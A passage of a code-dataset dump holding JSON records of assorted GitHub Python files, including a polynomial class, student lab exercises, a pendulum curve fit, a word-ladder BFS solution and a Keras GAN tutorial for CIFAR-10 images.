self.degree\n\n P = [self.coefficients[0] ** power]\n\n for k in range(1, power * n + 1):\n P.append(\n sum(\n (power * (k - i) - i) * self.coefficients[k - i] * P[i]\n for i in range(max(0, k - n), k)\n )\n / (k * self.coefficients[0])\n )\n\n if all(isinstance(coeff, int) for coeff in self.coefficients):\n P = [int(p) for p in P]\n\n return Polynomial(*P)\n\n def __truediv__(self, other: Number) -> Polynomial:\n if isinstance(other, Number):\n return Polynomial(\n *[Fraction(coefficient, other) for coefficient in self.coefficients]\n )\n return NotImplemented\n\n def __floordiv__(self, other: Polynomial) -> Polynomial:\n if not isinstance(other, Polynomial):\n return NotImplemented\n P, _ = divmod(self, other)\n return P\n\n def __mod__(self, other: Polynomial) -> Polynomial:\n if not isinstance(other, Polynomial):\n return NotImplemented\n _, Q = divmod(self, other)\n return Q\n\n def __divmod__(self, other: Polynomial) -> tuple[Polynomial, Polynomial]:\n dividend = self.coefficients.copy()\n quotient_degree = self.degree - other.degree\n if quotient_degree < 0:\n return Polynomial(), self\n\n quotient: list[Number] = [0] * (quotient_degree + 1)\n for k in range(quotient_degree + 1):\n d = Fraction(dividend[-k - 1], other.coefficients[-1])\n for i, c in enumerate(other.coefficients):\n dividend[quotient_degree - k + i] -= c * d\n quotient[-k - 1] = d\n\n Q = Polynomial(*quotient)\n D = Polynomial(*dividend)\n D._truncate()\n return Q, D\n\n def __eq__(self, other: Polynomial | Number) -> bool:\n if not isinstance(other, Polynomial):\n if self.degree != 0:\n return False\n return self.coefficients[0] == other\n\n if self.degree != other.degree:\n return False\n\n return all(\n coef1 == coef2\n for coef1, coef2 in zip(self.coefficients, other.coefficients)\n )\n\n def copy(self) -> Polynomial:\n return Polynomial(*self.coefficients.copy())\n\n def to_integer(self) -> Polynomial:\n denominators = [\n coeff.denominator\n for coeff in self.coefficients\n if isinstance(coeff, Fraction)\n ]\n factor = math.lcm(*denominators)\n return Polynomial(*[int(factor * coeff) for coeff in self.coefficients])\n\n def to_monic(self) -> Polynomial:\n factor = Fraction(1, self.coefficients[-1])\n return Polynomial(*[Fraction(coeff) * factor for coeff in self.coefficients])\n\n def gcd(self, other: Polynomial) -> Polynomial:\n a, b = self, other\n while b != 0:\n a, b = b, a % b\n return a.to_monic()\n\n def get_coprimes_and_gcd(\n self, other: Polynomial\n ) -> tuple[Polynomial, Polynomial, Polynomial]:\n gcd = self.gcd(other)\n return self // gcd, other // gcd, gcd\n\n def diff(self, order: int = 1) -> Polynomial:\n if order < 0:\n raise ValueError\n if order == 0:\n return self\n if order > self.degree:\n return Polynomial()\n\n falling_factorial = Polynomial.falling_factorial(order)\n return Polynomial(\n *[\n self.coefficients[k] * falling_factorial(k)\n for k in range(order, self.degree + 1)\n ]\n )\n\n def integral(\n self, order: int = 1, constants: list[Number] | None = None\n ) -> Polynomial:\n if order < 0:\n raise ValueError\n if order == 0:\n return self\n\n if constants is None:\n constants_part = [0] * order\n elif len(constants) != order:\n raise ValueError(\"Constants length must be equal to order\")\n else:\n constants_part = []\n f = Fraction(1)\n for i, constant in enumerate(constants):\n f = f / i if i != 0 else f\n constants_part.append(f * constant)\n\n rising_factorial = Polynomial.rising_factorial(order)\n\n integral_part = [\n Fraction(coeff) / rising_factorial(k + 1)\n for k, coeff in enumerate(self.coefficients)\n ]\n return Polynomial(*constants_part, *integral_part)\n\n @classmethod\n def falling_factorial(cls, power: int) -> Polynomial:\n if power < 0:\n raise ValueError(power)\n return cls(*[stirlingI(power, k) for k in range(power + 1)])\n\n @classmethod\n def rising_factorial(cls, power: int) -> Polynomial:\n if power < 0:\n raise ValueError(power)\n return cls(*[abs(stirlingI(power, k)) for k in range(power + 1)])\n","repo_name":"kirill-varchenko/math_playground","sub_path":"functions/polynomial.py","file_name":"polynomial.py","file_ext":"py","file_size_in_byte":8922,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"15657133521","text":"# Matthew Lingle\n# ​ CSCI 102 – Section C\n# Week 11 Lab\n# References: None\n# Time: 45 minutes\ndef to_hex(decimal):\n sixtenth=decimal//16\n ones=decimal%16\n list1=['0','1','2','3','4','5','6','7','8','9','A','B','C','D','E','F']\n hex1=list1[sixtenth]\n hex2=list1[ones]\n return hex1+hex2\ndef rgb_to_hex(rgb):\n red_hex=to_hex(rgb[0])\n green_hex=to_hex(rgb[1])\n blue_hex=to_hex(rgb[2])\n return red_hex+green_hex+blue_hex\n\n\n","repo_name":"mlingle/101-102-labs","sub_path":"lab102(11).py","file_name":"lab102(11).py","file_ext":"py","file_size_in_byte":461,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"33900640956","text":"import numpy as np\n\ndt = 0.01\na = 0.99\nv = 5\nw = 3.449\n\nA = np.array([[1, dt, 0, 0, 0, 0],\n [0, 1, 0, 0, 0, 0],\n [0, 0, 1, dt, 0, 0],\n [0, 0, 0, 0, v, 0],\n [0, 0, 0, 0, 1, dt],\n [0, 0, 0, 0, 0, a]])\n\nB = np.array([[0], [0], [0], [0], [0], [v * (1 - a) / w]])\nC = np.array([[0, 0, 1, 0, 0, 0]])\nQ = np.array([[10]])\nR = np.array([[0.5]])\n\nNp = 10\nNc = 4\n\nCA = C @ A\nF = np.array(CA)\nfor i in range(Np-1):\n CA = CA @ A\n F = np.append(F, CA, 0)\n\nCA = C\nphi = np.zeros((Np, Nc))\n\nfor i in range(Np):\n for j in range(Nc):\n CAB = CA @ B\n if (i + j + 1) <= phi.shape[0] and (j + 1) <= phi.shape[1]:\n phi[i+j, j] = CAB[0, 0]\n else:\n break\n CA = CA @ A\n\nR_bar = 0.5 * np.eye(Nc)\nRs = np.ones((Np, 1))\nx = np.transpose(np.array([[0, 10, 0, 0, 0, 0]]))\ndelta_u = np.linalg.inv(phi.transpose() @ phi + R_bar) @ phi.transpose() @ (Rs - F @ x)\nprint(F)\nprint(phi)\nprint(delta_u)","repo_name":"ryannguyen94/VehicleSim","sub_path":"VehicleSim/mpc.py","file_name":"mpc.py","file_ext":"py","file_size_in_byte":984,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"29325101649","text":"telefono = int(input('Ingrese numero telefonico: '))\nhora = int(input('Ingrese hora de la llamada: '))\n\n## número mas chico q puedo escribir con 8 cifras: 10000000 (si le resto 1: 9999999)\n## número mas grande q puedo escribir con 8 cifras: 99999999 (si le sumo 1: 100000000)\n\nif 10000000 <= telefono <= 99999999 and 0 <= hora <= 23:\n\n ## COND1: Si la llamada ocurre entre 00:00 y 07:00,\n ## la contestas ya que podría ser una emergencia.\n ## if hora >= 0 and hora <= 7: (TAMBIÉN SIRVE)\n\n if 0 <= hora <= 7:\n print('Resultado: CONTESTAR')\n\n ## COND2: Si la llamada ocurre antes de las 14:00\n ## no la contestas, excepto si el número termina en 909.\n\n if 7 < hora < 14:\n\n tresUltimosDigitos = telefono%1000 ## Con % consigo los ultimos digitos\n\n if tresUltimosDigitos == 909:\n print('Resultado: CONTESTAR')\n else: \n print('Resultado: NO CONTESTAR')\n\n ## COND3: Durante la tarde, solamente contestas entre 17:00 y 19:00,\n ## exceptuando un número que comienza por 877.\n\n if 14 <= hora < 17:\n print('Resultado: NO CONTESTAR')\n\n if 17 <= hora <= 19:\n\n tresPrimerosDigitos = telefono//100000 ## Con // obtengo el numero sin los 5 digitos de la derecha\n\n if tresPrimerosDigitos == 877:\n print('Resultado: NO CONTESTAR')\n else:\n print('Resultado: CONTESTAR')\n\n ## COND4: Después de las 19:00, no contestas el celular.\n if 19 < hora <= 23:\n print('Resultado: NO CONTESTAR')\n\nelse:\n print('Alguno de los valores ingresados')","repo_name":"pabloschwarzenberg/grader","sub_path":"hito1_ej2/hito1_ej2_faf7eb2aded7151922a8a27de9fc0aa2.py","file_name":"hito1_ej2_faf7eb2aded7151922a8a27de9fc0aa2.py","file_ext":"py","file_size_in_byte":1571,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"26998910579","text":"import pytest\nfrom freezegun import freeze_time\n\nfrom goals.serializers import GoalCategorySerializer\n\n\n@freeze_time(\"2023-03-10 03:21:34\", tz_offset=-4)\n@pytest.mark.django_db\ndef test_goal_category_list(client_api, board_factory, user, goal_category_factory):\n board = board_factory.create(with_owner=user)\n\n goal_category = goal_category_factory.create(title='Тестовая категория из теста', user=user, board=board)\n\n expected_response = [\n GoalCategorySerializer(goal_category).data\n ]\n client_api.force_login(user)\n response = client_api.get('/goals/goal_category/list')\n\n assert response.status_code == 200\n assert response.data == expected_response\n","repo_name":"BityutskiyNA/-sky_pro_todolist-","sub_path":"todolist/tests/goal/goal_category_list_view_test.py","file_name":"goal_category_list_view_test.py","file_ext":"py","file_size_in_byte":709,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"16019584235","text":"# example of training the discriminator model on real and random cifar10 images\nfrom numpy import expand_dims\nfrom numpy import ones\nfrom numpy import zeros\nfrom numpy import where\nfrom numpy.random import rand\nfrom numpy.random import randn\nfrom numpy.random import randint\nfrom keras.datasets.cifar10 import load_data\nfrom keras.optimizers import Adam\nfrom keras.models import Sequential\nfrom keras.layers import Dense\nfrom keras.layers import Conv2D\nfrom keras.layers import Flatten\nfrom keras.layers import Reshape\nfrom keras.layers import Dropout\nfrom keras.layers import LeakyReLU\nfrom keras.layers import Conv2DTranspose\nfrom matplotlib import pyplot\nimport NamedEntityMatching as NER\n\n\n#link to the lecture where this code is from\n#https://machinelearningmastery.com/how-to-develop-a-generative-adversarial-network-for-a-cifar-10-small-object-photographs-from-scratch/\n\n\n\n# example of loading the cifar10 dataset\n#Keras will automatically download a compressed version of the images and save them under your home directory in ~/.keras/datasets/\nfrom keras.datasets.cifar10 import load_data\n\n'''\n# load the images into memory\n(trainX, trainy), (testX, testy) = load_data()\n# summarize the shape of the dataset\nprint('Train', trainX.shape, trainy.shape)\nprint('Test', testX.shape, testy.shape)\n'''\n\nobjectnameDict = {\n 'airplane': 0,\n 'automobile': 1,\n 'bird': 2,\n 'cat': 3,\n 'deer': 4,\n 'dog': 5,\n 'frog': 6,\n 'horse': 7,\n 'ship': 8,\n 'truck': 9\n}\n\n\n#tutorial for centering and normalizing images\n#https://machinelearningmastery.com/how-to-manually-scale-image-pixel-data-for-deep-learning/\n# load and prepare cifar10 training images\n#We are scaling the images in the pixel range [-1,1] because our generator model will be using\n#the tanh activation function, so the pixel range will be [-1,1] for the fake images.\ndef load_real_samples(object):\n # load cifar10 dataset\n (trainX, trainY), (_, _) = load_data()\n # convert from unsigned ints to floats\n X = []\n for i in range(len(trainY)):\n if trainY[i][0]==objectnameDict[object]:\n X.append(trainX[i])\n X = trainX.astype('float32')\n # scale from [0,255] to [-1,1]\n X = (X - 127.5) / 127.5\n return X\n\n\n#We will use some real images from the CIFAR-10 dataset and some fake images to train our\n#discriminative model. We will use random sampling to choose images for stochastic gradient \n#descent. We label them with '1'.\n# select real samples\ndef generate_real_samples(dataset, n_samples):\n # choose random instances\n ix = randint(0, dataset.shape[0], n_samples)\n # retrieve selected images\n X = dataset[ix]\n # generate 'real' class labels (1)\n y = ones((n_samples, 1))\n return X, y\n\n\n# use the generator to generate n fake examples, with class labels\n#This is our real generator function. It takes as input n_samples number of points\n#generated from a gaussian distribution. It is upto the generator to find the right \n#distribution from the latent space. The generator will try to update it's weights \n#in such a way so it can generate images that are assigned a probablity closer to 1 \n#by the discriminator.\ndef generate_fake_samples(g_model, latent_dim, n_samples):\n # generate points in latent space\n x_input = generate_latent_points(latent_dim, n_samples)\n # predict outputs\n X = g_model.predict(x_input)\n # create 'fake' class labels (0)\n y = zeros((n_samples, 1))\n return X, y\n\n\n'''\n# generate n fake samples with class labels\n# We dont have a functioning generator model yet, but the actual generator model\n# will generate images using tanh activation function so the pixel range will be [-1,1]\n# and the label of all fake images will be '0'. We are making this dummy generator\n# function that works like that.\ndef generate_fake_samples(n_samples):\n # generate uniform random numbers in [0,1]\n X = rand(32 * 32 * 3 * n_samples)\n # update to have the range [-1, 1]\n X = -1 + X * 2\n # reshape into a batch of color images\n X = X.reshape((n_samples, 32, 32, 3))\n # generate 'fake' class labels (0)\n y = zeros((n_samples, 1))\n return X, y\n'''\n\n\n# train the discriminator model\ndef train_discriminator(model, dataset, n_iter=20, n_batch=128):\n#What is loss and what is accuracy in a model: https://stackoverflow.com/questions/34518656/how-to-interpret-loss-and-accuracy-for-a-machine-learning-model\n half_batch = int(n_batch / 2)\n # manually enumerate epochs\n for i in range(n_iter):\n # get randomly selected 'real' samples\n X_real, y_real = generate_real_samples(dataset, half_batch)\n # update discriminator on real samples\n real_loss, real_acc = model.train_on_batch(X_real, y_real)\n # generate 'fake' examples\n X_fake, y_fake = generate_fake_samples(half_batch)\n # update discriminator on fake samples\n fake_loss, fake_acc = model.train_on_batch(X_fake, y_fake)\n # summarize performance\n print('>%d real=%.0f%% fake=%.0f%%' % (i+1, real_acc*100, fake_acc*100))\n\n\n# # plot images from the training dataset\n# for i in range(49):\n# \t# define subplot\n# #subplots are used to create multiple plots in one plots\n# \tpyplot.subplot(7, 7, 1 + i)\n# \t# turn off axis\n# \tpyplot.axis('off')\n# \t# plot raw pixel data\n# #imshow finishes drawing a picture instead of painting it and show prints it\n# \tpyplot.imshow(trainX[i])\n# pyplot.show()\n\n\n# define the standalone discriminator model\ndef define_discriminator(in_shape=(32,32,3)):\n model = Sequential()\n # normal\n#tutorial to understand convolutional layers: https://machinelearningmastery.com/convolutional-layers-for-deep-learning-neural-networks/\n#tutorial for pooling layers: https://machinelearningmastery.com/pooling-layers-for-convolutional-neural-networks/\n#tutorial for adam: https://machinelearningmastery.com/adam-optimization-algorithm-for-deep-learning/\n#we need a certain filter to extract simple features like detecting horizontal or vertical \n#lines. We use more filters to extract out complex patterns and shapes from the image.\n\n#we use down sampling i.e. padding, strides etc to reduce the location dependency \n#of features. Because we just want to detect the presence of these features regardless \n#of where we find them.\n\n#LeakyRelU instead of RelU to avoid the dying RelU problem where once the loss is negative\n#the gradient is zero so the system can never update itself.\n\n#adam takes into account not only what the gradient is but also how fast or slow the \n#gradient is changing. \n#TODO\n#need to read about optimizers and adam more\n model.add(Conv2D(64, (3,3), padding='same', input_shape=in_shape))\n model.add(LeakyReLU(alpha=0.2))\n # downsample\n model.add(Conv2D(128, (3,3), strides=(2,2), padding='same'))\n model.add(LeakyReLU(alpha=0.2))\n # downsample\n model.add(Conv2D(128, (3,3), strides=(2,2), padding='same'))\n model.add(LeakyReLU(alpha=0.2))\n # downsample\n model.add(Conv2D(256, (3,3), strides=(2,2), padding='same'))\n model.add(LeakyReLU(alpha=0.2))\n # classifier\n model.add(Flatten())\n model.add(Dropout(0.4))\n model.add(Dense(1, activation='sigmoid'))\n # compile model\n opt = Adam(lr=0.0002, beta_1=0.5)\n model.compile(loss='binary_crossentropy', optimizer=opt, metrics=['accuracy'])\n return model\n\n\n# define the standalone generator model\n#deconvolution well explained: https://machinelearningmastery.com/upsampling-and-transpose-convolution-layers-for-generative-adversarial-networks/\n#We use kernel size that is a multiple of stride to avoid deconvolution checkerboard\n#problem. Explained here: https://distill.pub/2016/deconv-checkerboard/\ndef define_generator(latent_dim):\n model = Sequential()\n # foundation for 4x4 image\n n_nodes = 256 * 4 * 4\n model.add(Dense(n_nodes, input_dim=latent_dim))\n model.add(LeakyReLU(alpha=0.2))\n model.add(Reshape((4, 4, 256)))\n # upsample to 8x8\n model.add(Conv2DTranspose(128, (4,4), strides=(2,2), padding='same'))\n model.add(LeakyReLU(alpha=0.2))\n # upsample to 16x16\n model.add(Conv2DTranspose(128, (4,4), strides=(2,2), padding='same'))\n model.add(LeakyReLU(alpha=0.2))\n # upsample to 32x32\n model.add(Conv2DTranspose(128, (4,4), strides=(2,2), padding='same'))\n model.add(LeakyReLU(alpha=0.2))\n # output layer\n model.add(Conv2D(3, (3,3), activation='tanh', padding='same'))\n return model\n\n\n# generate points in latent space as input for the generator\ndef generate_latent_points(latent_dim, n_samples):\n # generate points in the latent space\n x_input = randn(latent_dim * n_samples)\n # reshape into a batch of inputs for the network\n x_input = x_input.reshape(n_samples, latent_dim)\n return x_input\n\n\n# define the combined generator and discriminator model, for updating the generator\n#In our composite gan model we are stacking our generator model and discriminator model \n#together. Our generator will generate fake images and feed it to the discriminator model.\n#The output of the 1st layer which is the generator model will be a 32*32 image with 3 color channels.\n#The will be the input to the discriminator model. The discriminator will output a binary classification.\n#So the output of the whole composite model will be a binary classification. The model will try to\n#minimize its loss based on that output. Basically it will try to update its weights in such\n# a way so the label of the generated images generated from the first layer is assigned a \n#probablity closer to 1 by the second layer which is the output of the composite layer.\ndef define_gan(g_model, d_model):\n # make weights in the discriminator not trainable\n d_model.trainable = False\n # connect them\n model = Sequential()\n # add generator\n model.add(g_model)\n # add the discriminator\n model.add(d_model)\n # compile model\n opt = Adam(lr=0.0002, beta_1=0.5)\n model.compile(loss='binary_crossentropy', optimizer=opt)\n return model\n\n\n# train the generator and discriminator\n#Here we train discriminator twice per epoch, separately with fake and real samples.\n#Then we generate latent points and feed that as input to the generator. This time we label\n#the fake images with '1' even though they are fake. This is important because the discriminator\n#will assign a lower probablity that is close to zero to these images. The generator\n#as a result will have a higher loss, meaning the difference between 1 and the probablity assigned\n#by the discriminator. So it will continuously try to generate images in a way so the images\n#are assigned a higher probablity by the discriminator.\ndef train(g_model, d_model, gan_model, dataset, latent_dim, n_epochs=200, n_batch=128):\n bat_per_epo = int(dataset.shape[0] / n_batch)\n half_batch = int(n_batch / 2)\n # manually enumerate epochs\n for i in range(n_epochs):\n # evaluate the model performance, sometimes\n if (i+1) % 10 == 0:\n summarize_performance(i, g_model, d_model, dataset, latent_dim)\n # save the generator model tile file\n filename = 'generator_model_%03d.h5' % (epoch+1)\n g_model.save(filename)\n # enumerate batches over the training set\n for j in range(bat_per_epo):\n # get randomly selected 'real' samples\n X_real, y_real = generate_real_samples(dataset, half_batch)\n # update discriminator model weights\n d_loss1, _ = d_model.train_on_batch(X_real, y_real)\n # generate 'fake' examples\n X_fake, y_fake = generate_fake_samples(g_model, latent_dim, half_batch)\n # update discriminator model weights\n d_loss2, _ = d_model.train_on_batch(X_fake, y_fake)\n # prepare points in latent space as input for the generator\n X_gan = generate_latent_points(latent_dim, n_batch)\n # create inverted labels for the fake samples\n y_gan = ones((n_batch, 1))\n # update the generator via the discriminator's error\n g_loss = gan_model.train_on_batch(X_gan, y_gan)\n # summarize loss on this batch\n print('>%d, %d/%d, d1=%.3f, d2=%.3f g=%.3f' %\n (i+1, j+1, bat_per_epo, d_loss1, d_loss2, g_loss))\n\n\n#To evaluate a performance of gan, unfortunately we need a human operator because we \n#cannot evaluate gan models objectively. So we have three ways to do this.\n#1. After certain number of epochs, calculate the disciminator accuracy and print it.\n#2. After every certain number of epochs, save the generator model.\n#3. Save the images generated by the corresponding generator model that we saved.\ndef summarize_performance(epoch, g_model, d_model, dataset, latent_dim, n_samples=150):\n # prepare real samples\n X_real, y_real = generate_real_samples(dataset, n_samples)\n # evaluate discriminator on real examples\n _, acc_real = d_model.evaluate(X_real, y_real, verbose=0)\n # prepare fake examples\n x_fake, y_fake = generate_fake_samples(g_model, latent_dim, n_samples)\n # evaluate discriminator on fake examples\n _, acc_fake = d_model.evaluate(x_fake, y_fake, verbose=0)\n # summarize discriminator performance\n print('>Accuracy real: %.0f%%, fake: %.0f%%' % (acc_real*100, acc_fake*100))\n\n\n# create and save a plot of generated images\n#Function for saving the images generated by the generator model we will save periodically.\ndef save_plot(examples, epoch, n=7):\n # scale from [-1,1] to [0,1]\n examples = (examples + 1) / 2.0\n # plot images\n for i in range(n * n):\n # define subplot\n pyplot.subplot(n, n, 1 + i)\n # turn off axis\n pyplot.axis('off')\n # plot raw pixel data\n pyplot.imshow(examples[i])\n # save plot\n save_plot(x_fake, epoch)\n # save plot to file\n filename = 'generated_plot_e%03d.png' % (epoch+1)\n pyplot.savefig(filename)\n pyplot.close()\n\n\n'''\n# generate samples\n#Generate fake samples using the untrained generator model and plot them.\nmodel = define_generator(latent_dim)\nn_samples = 49\nX, _ = generate_fake_samples(model, latent_dim, n_samples)\n# scale pixel values from [-1,1] to [0,1]\nX = (X + 1) / 2.0\n# plot the generated samples\nfor i in range(n_samples):\n # define subplot\n pyplot.subplot(7, 7, 1 + i)\n # turn off axis labels\n pyplot.axis('off')\n # plot single image\n pyplot.imshow(X[i])\n# show the figure\npyplot.show()\n'''\n\n\n# size of the latent space\nlatent_dim = 100\n# create the discriminator\nd_model = define_discriminator()\n# create the generator\ng_model = define_generator(latent_dim)\n# create the gan\ngan_model = define_gan(g_model, d_model)\n# summarize gan model\ngan_model.summary()\n# plot gan model\n# plot_model(gan_model, to_file='gan_plot.png', show_shapes=True, show_layer_names=True)\n# load image data\n#This is a dummy example to demonstrate how the named entity recognizer will communicate with\n#image generator. This is very rudimentary and will be updated later.\n#TODO: thorough readup of the spacy library\n#https://spacy.io/\nobjects = NER.extract_objects()\nobjects[0] = 'frog'\ndataset = load_real_samples(objects[0])\n# train model\n# train(g_model, d_model, gan_model, dataset, latent_dim)","repo_name":"Ridi113/python-gan-comics","sub_path":"gan-CIFAR-10-object-image-generation.py","file_name":"gan-CIFAR-10-object-image-generation.py","file_ext":"py","file_size_in_byte":15192,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"4760807081","text":"# %%\nimport pandas as pd\nimport numpy as np\nimport networkx as nx\nimport networkx.drawing.nx_pydot as pyd\nimport matplotlib as plt\nimport csv\n\n# read individual data\nindividuals = pd.read_csv(r'C:\\Python\\Graphs\\AHRI_Individuals.csv', sep=',', header=0, index_col=0, dtype={\n 'MotherId': int, 'FatherId': int, 'NodeId': int}, parse_dates=['DoB', 'DoD'])\nindividuals.info()\nG = nx.DiGraph()\nfor row in individuals.itertuples():\n # Add node\n G.add_node(row.Index, sex=row.Sex)\n # Add mother edge\n if row.MotherId != 0:\n G.add_edge(row.MotherId, row.Index, type=2)\n if row.FatherId != 0:\n G.add_edge(row.FatherId, row.Index, type=1)\nwith open(r'C:\\Python\\Graphs\\subgraph_degrees.csv', mode='w') as csv_file:\n fieldnames = ['root', 'degree','parent', 'child', 'type']\n writer = csv.DictWriter(csv_file, fieldnames=fieldnames)\n writer.writeheader()\n for w in nx.weakly_connected_component_subgraphs(G):\n l = nx.topological_sort(w)\n for p, c, t in w.edges(data=True):\n writer.writerow({'root': next(l), 'degree': w.order(),'parent': p, 'child': c, 'type': t['type']})\n csv_file.close()\n","repo_name":"kobusherbst/Networks","sub_path":"code/parental_network.py","file_name":"parental_network.py","file_ext":"py","file_size_in_byte":1173,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"34155561495","text":"import numpy as np\nimport matplotlib.pyplot as plt\nfrom scipy.optimize import curve_fit\n\n#import dei dati\nx, y =np.loadtxt(r'C:\\Users\\ACER\\OneDrive\\Desktop\\Laboratorio I\\esperienze-secondo-semestre\\oscillazioni-accoppiate\\DATI_oscilalzioni_accoppiate\\oscillazionismorzate2_MarcoNico.txt', usecols=(2, 3), unpack=True)\n\n#scartiamo i primi dati, in cui il pendolo era fermo\nx=x[22:1669]\ny=y[22:1669]\ndx=np.full(x.shape, 0.001) #secondi\ndy=np.full(y.shape, 1) #unità arbitrarie\n\n#modello\ndef f(t, a0, tau, w, fi, k):\n return a0*np.exp(-t/tau)*np.cos(w*t + fi) + k\n\n#pguess\np=[134, 35., 4.63, 0., 479]\n\n#fit dei dati\npopt, pcov= curve_fit(f, x, y, p0=p, sigma=dy)\na0_hat, tau_hat, w_hat, fi_hat, k_hat = popt\nda0, dtau, dw, dfi, dk = np.sqrt(pcov.diagonal())\n\n#print parametri di best fit\nprint('Ampiezza di oscillazione', a0_hat, '\\pm', da0)\nprint('tempo di decadimento', tau_hat, '\\pm', dtau)\nprint('pulsazione', w_hat, '\\pm', dw)\nprint('fase', fi_hat, '\\pm', dfi)\nprint('Costante di traslzione', k_hat, '\\pm', dk)\n\n#Calcolo del periodo\nT_hat = (2*np.pi)/w_hat\ndT= (2*np.pi*dw)/(w_hat)**2 \nprint('periodo', T_hat, '\\pm', dT)\n\n\n#residui normalizzati e chisq\nres= (y - f(x, *popt))/dy\nX=np.sqrt(2*1642) \nchisq= np.sum((((y - f(x, *popt))/dy)**2))\nprint(f'Chi quadro = {chisq :.1f}')\nprint('Chisq atteso', 1642, '+/-', X)\n\n#plot\nfig = plt.figure('Pendolo_singolo_smorzato')\nax1, ax2 = fig.subplots(2, 1, sharex=True, gridspec_kw=dict(height_ratios=[2, 1], hspace=0.05))\nax1.errorbar(x[::3], y[::3], dy[::3], dx[::3], fmt='.', label='Dati', color='midnightblue')\nax1.plot(x, f(x, *popt), label='Modello di best-fit', color='deepskyblue')\nax1.set_ylabel('ampiezza [a. u.]')\nax1.grid(color='lightgray', ls='dashed')\nax1.legend()\nax2.errorbar(x[::3], res[::3], dy[::3], fmt='.', color='midnightblue')\nax2.plot(x, np.full(x.shape, 0.0), color='deepskyblue')\nax2.set_xlabel('tempo [secondi]')\nax2.set_ylabel('Residui normalizzati [a. u.]')\nax2.grid(color='lightgray', ls='dashed')\nplt.ylim(-12, 14)\nplt.xlim(26, 28.5)\nfig.align_ylabels((ax1, ax2))\n#fig2= plt.figure('residui 2')\n#plt.errorbar(res[::3], x[::3], dx[::3], fmt='.')\n#plt.plot\nplt.show()","repo_name":"NicoloBottiglioni/Laboratorio-I","sub_path":"esperienze-secondo-semestre/oscillazioni-accoppiate/CODICI_oscillazioni_accoppiate/Pendolo_singolo_smorzato.py","file_name":"Pendolo_singolo_smorzato.py","file_ext":"py","file_size_in_byte":2142,"program_lang":"python","lang":"it","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"70238085370","text":"import pickle\nimport os\n\n# File contains configuration for the simulation\n\nREAL_TIME = False # which mode the scheduler should run in\nHAS_DISPLAY = False # displays a window if True\nFV_OPTIMISATION = False # whether we are using the optimisation version\nRUN_ALL_MODES = True\nSCHEDULER_MODE = \"fv\" # can be fv, rr or edf\nSHARED_DIR = \"shared\"\nDETAILS_DIR = \"details\"\nMEDIA_DIR = \"media\"\nRESULTS_DIR = \"output\"\nGRAPHS_DIR = \"graph\"\nFPS_SCALE = 1 / 10\nSCREEN_MAX_WIDTH = 1280\nSCREEN_MAX_HEIGHT = 720\nREGRESSION_MODEL_PATH = \"multiple_regression.sav\"\n\ndef get_resized_dim(frame):\n width = int(frame.shape[1])\n height = int(frame.shape[0])\n\n if width> SCREEN_MAX_WIDTH:\n height = round(height* SCREEN_MAX_WIDTH/width)\n width = SCREEN_MAX_WIDTH\n\n if height> SCREEN_MAX_HEIGHT:\n width = round(width* SCREEN_MAX_HEIGHT/height)\n height = SCREEN_MAX_HEIGHT\n \n return (width,height)\n\ndef save_regression_model(model):\n file_path = os.path.join(SHARED_DIR, DETAILS_DIR, REGRESSION_MODEL_PATH)\n pickle.dump(model, open(file_path, \"wb\"))\n\ndef load_regression_model():\n file_path = os.path.join(SHARED_DIR, DETAILS_DIR, REGRESSION_MODEL_PATH)\n return pickle.load(open(file_path, \"rb\"))\n\ndef get_csv_paths(vid_file, is_prediction):\n files = [vid_file[:-4] + \"_content.csv\",\n vid_file[:-4] + \"_dynamism.csv\",\n vid_file[:-4] + \"_impact.csv\",\n vid_file[:-4] + \"_total.csv\"]\n if is_prediction:\n files = [\"predicted_\" + _file for _file in files]\n files = [os.path.join(SHARED_DIR, RESULTS_DIR, _file) for _file in files]\n \n return files\n\ndef get_plot_path(path):\n return os.path.join(SHARED_DIR, GRAPHS_DIR,path)\n\n ","repo_name":"R-chard/Real-time-Video-Scheduler","sub_path":"shared/details/config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":1713,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"32919372003","text":"\"\"\"\nLeetcode problem 127: https://leetcode.com/problems/word-ladder/description/\n\"\"\"\n\nfrom collections import deque, defaultdict\n\nclass Solution:\n def ladderLength(self, beginWord: str, endWord: str, wordList: List[str]) -> int:\n if endWord not in wordList:\n return 0\n\n if beginWord not in wordList:\n wordList.append(beginWord) \n \n graph = self.form_graph(wordList) \n \n return self.bfs(graph, beginWord, endWord) \n \n def form_graph(self, wordList):\n graph = defaultdict(list) \n\n for word in wordList:\n for i in range(len(word)):\n prefix = word[:i]\n pattern = prefix + \"*\" + word[i + 1:] \n graph[pattern].append(word) \n \n return graph \n \n def bfs(self, graph, beginWord, endWord): \n start_queue = deque([beginWord])\n end_queue = deque([endWord]) \n start_visited = set([beginWord])\n end_visited = set([endWord]) \n distance = 0\n\n while start_queue and end_queue:\n distance += 1 \n if self.find_joint(graph, start_queue, start_visited, end_visited):\n return distance \n \n distance += 1\n if self.find_joint(graph, end_queue, end_visited, start_visited):\n return distance \n \n return 0 \n \n def find_joint(self, graph, queue, visited, opposite_visited):\n for _ in range(len(queue)):\n cur = queue.popleft() \n if cur in opposite_visited:\n return True \n for i in range(len(cur)):\n prefix = cur[:i]\n pattern = prefix + \"*\" + cur[i + 1:] \n for n in graph[pattern]:\n if n in visited:\n continue \n visited.add(n)\n queue.append(n) \n \n return False \n\n\n ","repo_name":"sherry-debug715/Algorithms-notes","sub_path":"BFS/bidirectionalBFS/wordLadder.py","file_name":"wordLadder.py","file_ext":"py","file_size_in_byte":1956,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"33788992437","text":"states = {\n\t\"Lucy\": 